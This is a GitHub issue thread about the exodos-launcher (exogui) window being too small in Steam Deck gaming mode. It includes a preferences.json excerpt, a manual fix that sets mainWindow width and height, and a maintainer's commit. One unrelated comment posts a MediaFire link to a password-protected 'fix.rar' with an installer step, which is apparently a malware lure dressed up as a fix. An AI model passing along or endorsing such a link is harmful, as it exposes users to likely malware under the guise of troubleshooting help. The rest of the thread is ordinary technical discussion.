### ISSUE TITLE
correct window size for Steam Deck gaming mode

### ISSUE THREAD

**Issue by parricc** [margorski/exodos-launcher#44]
After installing and launching exogui for the first time in Steam gaming mode, the `preferences.json` file gets created with the following:
```
{
  "browsePageGameScale": 0.087,
  "enableEditing": false,
  "browsePageLayout": 0,
  "browsePageShowLeftSidebar": true,
  "browsePageShowRightSidebar": true,
  "browsePageLeftSidebarWidth": 320,
  "browsePageRightSidebarWidth": 320,
  "curatePageLeftSidebarWidth": 320,
  "showDeveloperTab": false,
  "currentTheme": "Metal\\theme.css",
  "lastSelectedLibrary": "",
  "gamesOrderBy": "title",
  "gamesOrder": "ascending",
  "defaultLibrary": "arcade",
  "mainWindow": {
    "maximized": false
  },
  "saveImportedCurations": true,
  "showLogSource": {}
}
```

This causes enough of the righthand pane to be cut off that games aren't launchable.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by parricc** [comment]
Adding these values to `mainWindow` part gives the correct size:
```
  "mainWindow": {
    "x": 0,
    "y": 29,
    "width": 1280,
    "height": 800,
    "maximized": false
  },
```

**Comment by colin969** [comment]
Fixed in https://github.com/margorski/exodos-launcher/commit/06527a69d0c20e213c35e439e7cc986bcb4ff5a2

Probably. I can't actually get it to run anyway myself, but this should ensure it forces the window resolution when running in Gamescope with Steam Deck.

**Comment by parricc** [comment]
Confirmed this issue is fixed.
